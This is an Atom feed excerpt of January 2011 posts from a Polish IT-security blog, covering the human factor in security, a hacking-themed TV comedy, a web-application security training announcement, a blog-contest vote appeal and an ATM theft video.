width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4511012464226103155.post-7031172583017665840</id><published>2011-01-14T21:17:00.003+01:00</published><updated>2011-01-14T21:24:14.421+01:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Bezpieczeństwo aplikacji"/><category scheme="http://www.blogger.com/atom/ns#" term="Bezpieczeństwo danych"/><category scheme="http://www.blogger.com/atom/ns#" term="Bezpieczeństwo sieci komputerowych"/><category scheme="http://www.blogger.com/atom/ns#" term="Bezpieczeństwo systemów operacyjnych"/><category scheme="http://www.blogger.com/atom/ns#" term="Obrona - Atak"/><title type='text'>Wszyscy jesteśmy najsłabszym ogniwem?</title><content type='html'>&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;a href=&quot;http://www.hcsl.pl/2011/01/wszyscy-jestesmy-najsabszym-ogniwem.html&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 0em; margin-right: 0em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKl_8AG7ORlFcHG9wahTrhQ4QlNp19igSOJTECyL6CA-MvXDDOfvPfFN7aF90FejOoCHGooMGusz9yrRBeWlLqzpuuaZrHyhmAKJqRBk4F71yH89WApdlXYYOerTylWxs2lxDztwr1GU0/s1600/Najslabsze.png&quot; /&gt;&lt;/a&gt;Pokładanie nadziei w rozmaitych technologicznych zabezpieczeniach, to krótko mówiąc czysta naiwność. Każdy system i każde zabezpieczenie można złamać... lub po prostu obejść. Jeśli nie można złamać systemu, to można oszukać lub złamać jego operatora. Czasem wystarczy tylko wykorzystać jego ludzkie słabości. Niezmiennie najsłabsze ogniowo stanowi więc &lt;a href=&quot;http://www.hcsl.pl/2010/06/nowy-rodzaj-zautomatyzowanych-atakow.html&quot;&gt;czynnik ludzki&lt;/a&gt;. Doskonale wiedzą o tym włamywacze, ale i specjaliści zajmujący się bezpieczeństwem. Jeśli jednak wy w to nie wierzycie, to zapraszam do obejrzenia pewnej ilustracji, która rozwieje w tym zakresie wszelkie wątpliwości...&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Na pierwszy rzut oka poniższe zabezpieczenie wydaje się całkiem solidne, przyjrzycie&amp;nbsp;się&amp;nbsp;jednak uważnie:&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcZwUX5sHyeBdt3huhl1oFDx5McZvawBon96WizYcuCJFdaNaAwA-mrHA4ttN8iWJgO_av5foruHbPlr9aNvZjTUTxcq8pLMuHuiK64agg1egugr71WsJhm4yqZqyS33EAFBscNT3hYAk/s1600/Najslabsze01.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;297&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcZwUX5sHyeBdt3huhl1oFDx5McZvawBon96WizYcuCJFdaNaAwA-mrHA4ttN8iWJgO_av5foruHbPlr9aNvZjTUTxcq8pLMuHuiK64agg1egugr71WsJhm4yqZqyS33EAFBscNT3hYAk/s400/Najslabsze01.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;Kto jest najsłabszym ogniwem?&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
Jaki z tego płynie wniosek dla osób zainteresowanych bezpieczeństwem informatycznym? Otóż żadne sprzętowe oraz programowe zabezpieczenia nie spełnią dobrze swej roli, jeśli ich operatorzy poprzez swą &lt;a href=&quot;http://www.hcsl.pl/2010/09/jak-zdalnie-przejac-kontrole-nad.html&quot;&gt;lekkomyślność&lt;/a&gt;&amp;nbsp;(a czasem celowe działania) spowodują powstanie ogromnych luk w całym systemie.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Czy będzie to &lt;a href=&quot;http://www.hcsl.pl/2010/10/oto-program-ktory-jest-w-stanie.html&quot;&gt;zbyt słabe hasło&lt;/a&gt; broniące dostępu do konta administracyjnego, czy też furtka pozostawiona przez kogoś w pełni umyślnie, tego typu przypadki stanowią zazwyczaj zagrożenie o wiele poważniejsze niż np. ryzyko związane z odkryciem nowej luki typu &lt;i&gt;Zero Day&lt;/i&gt; w wykorzystywanym przez nas oprogramowaniu. Chcąc więc zabezpieczyć się przed tego typu zdarzeniami zawsze musimy sobie zadać pytanie o to, kto pilnuje naszych strażników? Jestem ciekaw jak wygląda to w waszych organizacjach? Czy w ich ramach istnieją działy kontrolujące poczynania administratorów oraz całego personelu IT?&lt;br /&gt;
&lt;br /&gt;
Na koniec chciałbym tylko przypomnieć, że nadal &lt;a href=&quot;http://www.hcsl.pl/2011/01/hard-core-security-lab-blogiem-roku.html&quot;&gt;możecie oddawać swoje głosy na HCSL&lt;/a&gt;. Poza tym, wszystko wskazuje na to, że już niedługo uda mi się zorganizować kolejny konkurs (zob. &lt;a href=&quot;http://www.hcsl.pl/2010/11/urodzinowy-konkurs-hcsl-ogoszenie.html&quot;&gt;wyniki poprzedniego konkursu&lt;/a&gt;) dla wszystkich zainteresowanych&amp;nbsp;bezpieczeństwem&amp;nbsp;IT, zachęcam więc jak zwykle do zachowania czujności rewolucyjnej!&lt;br /&gt;
&lt;br /&gt;
[&lt;a href=&quot;http://i.imgur.com/rGtgr.jpg&quot;&gt;źródło&lt;/a&gt;]&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hcseclab.blogspot.com/feeds/7031172583017665840/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://hcseclab.blogspot.com/2011/01/wszyscy-jestesmy-najsabszym-ogniwem.html#comment-form' title='Komentarze (0)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/7031172583017665840'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/7031172583017665840'/><link rel='alternate' type='text/html' href='http://hcseclab.blogspot.com/2011/01/wszyscy-jestesmy-najsabszym-ogniwem.html' title='Wszyscy jesteśmy najsłabszym ogniwem?'/><author><name>\m/ojtek</name><uri>http://www.blogger.com/profile/00686678747901186941</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3kPKADUZjOVHLatr652Rn3sSYbK4nJahwcOl4VKk7SqP2zGIxUqZnxpvl45cvn_NGlAw7lyEV4CDIE58SyCxwGnRy1rEZNCjgKWu5NO0BCnsw-9s3cNevdmM3puj1RJ4/s220/P1010377.JPG'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKl_8AG7ORlFcHG9wahTrhQ4QlNp19igSOJTECyL6CA-MvXDDOfvPfFN7aF90FejOoCHGooMGusz9yrRBeWlLqzpuuaZrHyhmAKJqRBk4F71yH89WApdlXYYOerTylWxs2lxDztwr1GU0/s72-c/Najslabsze.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4511012464226103155.post-7099917996740932922</id><published>2011-01-13T23:22:00.002+01:00</published><updated>2011-01-13T23:24:52.151+01:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Inne"/><category scheme="http://www.blogger.com/atom/ns#" term="Newsy"/><title type='text'>Nowy amerykański serial o... (nie)bezpieczeństwie!</title><content type='html'>&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;a href=&quot;http://www.hcsl.pl/2011/01/nowy-amerykanski-serial-o.html&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 0em; margin-right: 0em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg59mu4Qn6ULdpkLKlV5eh7SXtwKMHde-6vlhRWCVYYx_pALAOR3qDIlaH5f-TSHoqbtIZ6KQgSV9Qg2QmsTnGBevgMMkzwcWRNLR8WBxn5Jtf1Dh-AT331-XV2oZO-RG3GCbRaxfBO1sI/s1600/Breaking+In.png&quot; /&gt;&lt;/a&gt;Amerykańska sieć telewizyjna FOX na 6. kwietnia zaplanowała emisję pierwszego odcinka nowego serialu &lt;a href=&quot;http://www.imdb.com/title/tt1630574/&quot;&gt;&lt;i&gt;Breaking In&lt;/i&gt;&lt;/a&gt;. Pewnie nie byłoby w tym fakcie nic szczególnie interesującego gdyby nie to, że cała akcja ma się rozgrywać wokół tematyki bezpieczeństwa informatycznego, bezpieczeństwa fizycznego, testów penetracyjnych oraz hackingu. Zachęcam więc do zwrócenia uwagi na zapowiedź nadchodzącej produkcji.&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Telewizja FOX &lt;a href=&quot;http://www.fox.com/breakingin/&quot;&gt;zapowiada&lt;/a&gt; nowy serial jako komedię rozgrywającą się w firmie zajmującej się bezpieczeństwem nowoczesnych technologii, niestety przed polskimi internautami amerykańscy filmowcy chcą &amp;nbsp;jednak najwyraźniej coś ukryć:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNIU9vLJdmuci1nJUPps4_f-jjbCS-99XUZppI1qPuiJjKeJKxfwE5XrH2Lfhpw4G8XfCkqRaZhtj_wI7nVcGRbsDHOQkPg2hFK04nLQFLWwzbcHQQww3N4LD0qln7vu46Lmqr5_U2_aQ/s1600/Breaking+In01.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;357&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNIU9vLJdmuci1nJUPps4_f-jjbCS-99XUZppI1qPuiJjKeJKxfwE5XrH2Lfhpw4G8XfCkqRaZhtj_wI7nVcGRbsDHOQkPg2hFK04nLQFLWwzbcHQQww3N4LD0qln7vu46Lmqr5_U2_aQ/s400/Breaking+In01.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Cóż, trailer możecie obejrzeć poniżej:&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;object height=&quot;385&quot; width=&quot;640&quot;&gt;&lt;param name=&quot;movie&quot; value=&quot;http://www.youtube.com/v/z0JelXjf_Lk?fs=1&amp;amp;hl=pl_PL&amp;amp;rel=0&quot;&gt;




&lt;/param&gt;
&lt;param name=&quot;allowFullScreen&quot; value=&quot;true&quot;&gt;




&lt;/param&gt;
&lt;param name=&quot;allowscriptaccess&quot; value=&quot;always&quot;&gt;




&lt;/param&gt;
&lt;embed src=&quot;http://www.youtube.com/v/z0JelXjf_Lk?fs=1&amp;amp;hl=pl_PL&amp;amp;rel=0&quot; type=&quot;application/x-shockwave-flash&quot; allowscriptaccess=&quot;always&quot; allowfullscreen=&quot;true&quot; width=&quot;640&quot; height=&quot;385&quot;&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Wygląda więc na to, że firma prowadzona przez OZ&#39;a (Christian Slater) sprzedaje swe usługi związane z bezpieczeństwem, zachęcając klientów do ich zakupu poprzez uprzednie naruszanie zabezpieczeń oraz inne rozmaite nieuczciwe praktyki. Z pewnością tego rodzaju sytuacje zdarzają się w rzeczywistości, tematyka serialu wydaje się więc całkiem interesująca.&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Z dostępnych obecnie informacji wynika, że drużyna OZ&#39;a będzie się przede wszystkim zajmować bezpieczeństwem fizycznym. Poruszana ma być jednak również tematyka hackingu, testów penetracyjnych oraz ogólnie pojętego bezpieczeństwa teleinformatycznego.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4TFp3QmfjQRPRP5CYRTIryCNO4i58jo2muCvyNCIb2nKQol2Ic8-cVhA3eDmrytSdRzubnIetTg8XuNwPip6S3vicl3D4fDPiU9kjLQIq_cqcBQV1Yj1i1lj0igqaSv7lL7PZiNdpW4Y/s1600/Breaking+In02.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;265&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4TFp3QmfjQRPRP5CYRTIryCNO4i58jo2muCvyNCIb2nKQol2Ic8-cVhA3eDmrytSdRzubnIetTg8XuNwPip6S3vicl3D4fDPiU9kjLQIq_cqcBQV1Yj1i1lj0igqaSv7lL7PZiNdpW4Y/s400/Breaking+In02.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Jestem bardzo ciekaw tego, z jakim realizmem amerykańscy filmowcy podejdą do powyższych tematów. Z pewnością serial ten nie będzie posiadał zbyt wielu walorów edukacyjnych, ja jednak chętnie go obejrzę. Oczywiście, jeśli uda mi się jakoś obejść wszystkie zabezpieczenia telewizji FOX, mające chronić jej produkcje przed potencjalnymi widzami z nieodpowiednich państw. Jak zwykle jestem również ciekaw waszych opinii na temat &lt;i&gt;Breaking In&lt;/i&gt;.&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hcseclab.blogspot.com/feeds/7099917996740932922/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://hcseclab.blogspot.com/2011/01/nowy-amerykanski-serial-o.html#comment-form' title='Komentarze (0)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/7099917996740932922'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/7099917996740932922'/><link rel='alternate' type='text/html' href='http://hcseclab.blogspot.com/2011/01/nowy-amerykanski-serial-o.html' title='Nowy amerykański serial o... (nie)bezpieczeństwie!'/><author><name>\m/ojtek</name><uri>http://www.blogger.com/profile/00686678747901186941</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3kPKADUZjOVHLatr652Rn3sSYbK4nJahwcOl4VKk7SqP2zGIxUqZnxpvl45cvn_NGlAw7lyEV4CDIE58SyCxwGnRy1rEZNCjgKWu5NO0BCnsw-9s3cNevdmM3puj1RJ4/s220/P1010377.JPG'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg59mu4Qn6ULdpkLKlV5eh7SXtwKMHde-6vlhRWCVYYx_pALAOR3qDIlaH5f-TSHoqbtIZ6KQgSV9Qg2QmsTnGBevgMMkzwcWRNLR8WBxn5Jtf1Dh-AT331-XV2oZO-RG3GCbRaxfBO1sI/s72-c/Breaking+In.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4511012464226103155.post-4215755605853390859</id><published>2011-01-12T23:53:00.001+01:00</published><updated>2011-01-12T23:54:21.237+01:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Inne"/><category scheme="http://www.blogger.com/atom/ns#" term="Newsy"/><title type='text'>Szkolenie &quot;Zaawansowane bezpieczeństwo aplikacji www&quot;</title><content type='html'>&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;a href=&quot;http://www.hcsl.pl/2011/01/szkolenie-zaawansowane-bezpieczenstwo.html&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 0em; margin-right: 0em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi12clUplG71aDyUyXY5GRcbyZ32eCjBFoIa8v56qOqSwNw-LMR2CjJ7RmDpG6GMlSlB-r2fb7A2OhScMv41Pua4UwH1EHAb7msQgSuSGrMwGK7bVz5Rq43x1FxnRLLrTlkZNEL8Y2zqsYq/s320/Securitum.png&quot; /&gt;&lt;/a&gt;Wszystkie osoby zainteresowane zagadnieniami związanymi z bezpieczeństwem aplikacji www, zachęcam do wzięcia udziału w szkoleniu autorskim organizowanym przez firmę &lt;a href=&quot;http://www.securitum.pl/&quot;&gt;Securitum&lt;/a&gt; w dniach: 21-23.02.2011, w Krakowie. Świetny dobór tematów, prezentacje praktycznych ataków oraz prowadzący legitymujący się certyfikatem CISSP, wszystko to stanowi o unikalności szkolenia &lt;a href=&quot;http://www.securitum.pl/oferta/szkolenia/zaawansowane-bezpieczenstwo-aplikacji-www&quot;&gt;Zaawansowane bezpieczeństwo aplikacji www&lt;/a&gt;. Oczywiście i tym razem czytelnicy HARD CORE SECURITY LAB mogą liczyć na specjalne rabaty.&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&quot;Zaawansowane bezpieczeństwo aplikacji www&quot; stanowi rozwinięcie tematyki poruszanej na szkoleniu: &quot;&lt;a href=&quot;http://www.securitum.pl/oferta/szkolenia/bezpieczenstwo-aplikacji-www-szkolenie&quot;&gt;Bezpieczeństwo aplikacji www&lt;/a&gt;&quot;. W ramach trzydniowych warsztatów przygotowano:&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;przeszło 30 ćwiczeń (jest to około 90% szkolenia),&lt;/li&gt;
&lt;li&gt;1-miesięczną licencję na oprogramowanie burp suite pro (dla każdego uczestnika),&lt;/li&gt;
&lt;li&gt;możliwość zdalnego dostępu (również po szkoleniu) do podatnych aplikacji, wykorzystywanych w trakcie warsztatów.&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
Ramowy program szkolenia wygląda natomiast następująco:&lt;/div&gt;
&lt;div&gt;
&lt;ul&gt;
&lt;li&gt;Wykrywanie i wykorzystywanie podatności - warsztaty&lt;/li&gt;
&lt;li&gt;Zaawansowane ataki SQL injection - warsztaty&lt;/li&gt;
&lt;li&gt;Ataki na system uwierzytelnienia i autoryzacji - warsztaty&lt;/li&gt;
&lt;li&gt;Bezpieczeństwo AJAX - warsztaty&lt;/li&gt;
&lt;li&gt;Zaawansowane funkcje oprogramowania Burp Suite Pro - warsztaty&lt;/li&gt;
&lt;li&gt;Konfiguracja systemu WAF (web application firewall) - warsztaty&lt;/li&gt;
&lt;li&gt;Podstawy realizacji testów penetracyjnych klasy whitebox (analiza kodu źródłowego)&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Całościowy test bezpieczeństwa na aplikację w LAB - warsztaty&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
Wszystkich zainteresowanych powyższą tematyką zachęcam do skorzystania z &lt;a href=&quot;http://www.securitum.pl/kontakt/zaawansowane-bezpieczenstwo-aplikacji-www&quot;&gt;formularza zgłoszeniowego&lt;/a&gt;. Jak zwykle w przypadku szkoleń organizowanych przez zaprzyjaźnioną z HCSL firmę Securitum, możecie liczyć na specjalny rabat (150 PLN).&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Biorąc pod uwagę to, że tego typu profesjonalne, praktyczne szkolenia są w Polsce prawdziwą rzadkością, zachęcam wszystkich zainteresowanych do skorzystania z okazji do pogłębienia swej wiedzy w zakresie bezpieczeństwa aplikacji www.&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hcseclab.blogspot.com/feeds/4215755605853390859/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://hcseclab.blogspot.com/2011/01/szkolenie-zaawansowane-bezpieczenstwo.html#comment-form' title='Komentarze (0)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/4215755605853390859'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/4215755605853390859'/><link rel='alternate' type='text/html' href='http://hcseclab.blogspot.com/2011/01/szkolenie-zaawansowane-bezpieczenstwo.html' title='Szkolenie &quot;Zaawansowane bezpieczeństwo aplikacji www&quot;'/><author><name>\m/ojtek</name><uri>http://www.blogger.com/profile/00686678747901186941</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3kPKADUZjOVHLatr652Rn3sSYbK4nJahwcOl4VKk7SqP2zGIxUqZnxpvl45cvn_NGlAw7lyEV4CDIE58SyCxwGnRy1rEZNCjgKWu5NO0BCnsw-9s3cNevdmM3puj1RJ4/s220/P1010377.JPG'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi12clUplG71aDyUyXY5GRcbyZ32eCjBFoIa8v56qOqSwNw-LMR2CjJ7RmDpG6GMlSlB-r2fb7A2OhScMv41Pua4UwH1EHAb7msQgSuSGrMwGK7bVz5Rq43x1FxnRLLrTlkZNEL8Y2zqsYq/s72-c/Securitum.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4511012464226103155.post-6460970874278159386</id><published>2011-01-11T23:38:00.004+01:00</published><updated>2011-01-11T23:41:44.819+01:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="HCSL - Newsy"/><category scheme="http://www.blogger.com/atom/ns#" term="Inne"/><category scheme="http://www.blogger.com/atom/ns#" term="Newsy"/><title type='text'>HARD CORE SECURITY LAB Blogiem Roku 2010?</title><content type='html'>&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;a href=&quot;http://www.blogroku.pl/hcsl,gwh7s,blog.html&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 0em; margin-right: 0em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1NDtf3HmXGmaikw9-xJ5GaB9AbdJlUdG6OFbb_2t6I4CN9kmal7sqncs9OcCHyOdWscpRqvXx42vcw3r7XXcP_xbSIHMHgcjBpgJqcuBvJTdvZLw0Wuji7mj6nKAmAem1Z6c-LxGN_l8/s1600/Blog+roku.gif&quot; /&gt;&lt;/a&gt;Drodzy Czytelnicy! Zdecydowałem się na wzięcie udziału w konkursie &lt;a href=&quot;http://www.blogroku.pl/hcsl,gwh7s,blog.html&quot;&gt;Blog Roku 2010&lt;/a&gt;. Być może w ten sposób trafimy do kolejnych czytelników, którzy również będą zainteresowani swobodną wymianą wiedzy i doświadczeń z zakresu bezpieczeństwa informatycznego, dzięki czemu wszyscy będziemy mogli się znów czegoś nowego i interesującego nauczyć? Wszelkie ewentualne &lt;a href=&quot;http://www.blogroku.pl/0,3864,lista.html&quot;&gt;nagrody&lt;/a&gt; otrzymane w ramach tegoż konkursu, zostaną przeze mnie wykorzystane jako nagrody w kolejnym konkursie (zob. &lt;a href=&quot;http://www.hcsl.pl/2010/11/urodzinowy-konkurs-hcsl-ogoszenie.html&quot;&gt;poprzedni konkurs&lt;/a&gt;) dla czytelników HCSL. Jeśli więc chcielibyście oddać swój głos na HARD CORE SECURITY LAB, wystarczy tylko wysłać &lt;b&gt;SMS o treści B00246 na numer 7122&lt;/b&gt;. Koszt SMS, to 1,2&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: large;&quot;&gt;3&lt;/span&gt; zł brutto.&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hcseclab.blogspot.com/feeds/6460970874278159386/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://hcseclab.blogspot.com/2011/01/hard-core-security-lab-blogiem-roku.html#comment-form' title='Komentarze (0)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/6460970874278159386'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/6460970874278159386'/><link rel='alternate' type='text/html' href='http://hcseclab.blogspot.com/2011/01/hard-core-security-lab-blogiem-roku.html' title='HARD CORE SECURITY LAB Blogiem Roku 2010?'/><author><name>\m/ojtek</name><uri>http://www.blogger.com/profile/00686678747901186941</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3kPKADUZjOVHLatr652Rn3sSYbK4nJahwcOl4VKk7SqP2zGIxUqZnxpvl45cvn_NGlAw7lyEV4CDIE58SyCxwGnRy1rEZNCjgKWu5NO0BCnsw-9s3cNevdmM3puj1RJ4/s220/P1010377.JPG'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1NDtf3HmXGmaikw9-xJ5GaB9AbdJlUdG6OFbb_2t6I4CN9kmal7sqncs9OcCHyOdWscpRqvXx42vcw3r7XXcP_xbSIHMHgcjBpgJqcuBvJTdvZLw0Wuji7mj6nKAmAem1Z6c-LxGN_l8/s72-c/Blog+roku.gif" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4511012464226103155.post-2162791246072706166</id><published>2011-01-10T19:17:00.001+01:00</published><updated>2011-01-10T19:17:41.802+01:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Inne"/><title type='text'>Po co komu skimmery, gdy mamy pod ręką siekierę?</title><content type='html'>&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;a href=&quot;http://www.hcsl.pl/2011/01/po-co-komu-skimmery-gdy-mamy-pod-reka.html&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 0em; margin-right: 0em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_u3ZzslP1iEznR9Ma1xbK9FXpXCJSkAT0T7zoKkr7b_UBg0SwjgY2O0rnLGUc52ncEsg6cmhepF4rXSiOowF_JxTelvagwNGVCjrdBiyCHPncKOprsisTbwN5c5b5u_spyavfq_O5F2A/s1600/atm.png&quot; /&gt;&lt;/a&gt;Czytelnicy HARD CORE SECURITY LAB wielokrotnie mogli się już zapoznać z &lt;a href=&quot;http://www.hcsl.pl/2010/05/najnowsze-rodzaje-europejskich.html&quot;&gt;nowinkami technicznymi&lt;/a&gt; wykorzystywanymi przez złodziei okradających bankomaty, a dokładniej klientów z nich korzystających. Wiemy już również, że skimmery wykorzystywane do kopiowania kart płatniczych można bez większego problemu &lt;a href=&quot;http://www.hcsl.pl/2010/06/w-internecie-kwitnie-nielegalny-handel.html&quot;&gt;nabyć w Internecie&lt;/a&gt;, a ponieważ cały zestaw składa się zazwyczaj również z kamery rejestrującej kody PIN, to &lt;a href=&quot;http://www.hcsl.pl/2010/09/oto-dlaczego-nalezy-zasaniac-klawiature.html&quot;&gt;zasłanianie klawiatury&lt;/a&gt; bankomatu może nas niejednokrotnie uchronić przed utratą pieniędzy. Jak się jednak okazuje, są jeszcze na świecie złodzieje, którzy potrafią się obejść bez elektronicznych gadżetów...&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Trudno w to uwierzyć, ale są takie miejsca na świecie, gdzie przestępcy zabierają się do okradania bankomatu mając na wyposażeniu jedynie broń białą! Z resztą zobaczcie sami...&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;iframe allowfullscreen=&#39;allowfullscreen&#39; webkitallowfullscreen=&#39;webkitallowfullscreen&#39; mozallowfullscreen=&#39;mozallowfullscreen&#39; width=&#39;320&#39; height=&#39;266&#39; src=&#39;https://www.blogger.com/video.g?token=AD6v5dz708sG4SROIpfithjy9iPnYo0XeoF1iiAcyZqDfzusVisb_m7GCzBx-rtbtG0ey9snpEb8IJ-ePWLQlzz5&#39; class=&#39;b-hbp-video b-uploaded&#39; frameborder=&#39;0&#39;&gt;&lt;/iframe&gt;&lt;/div&gt;
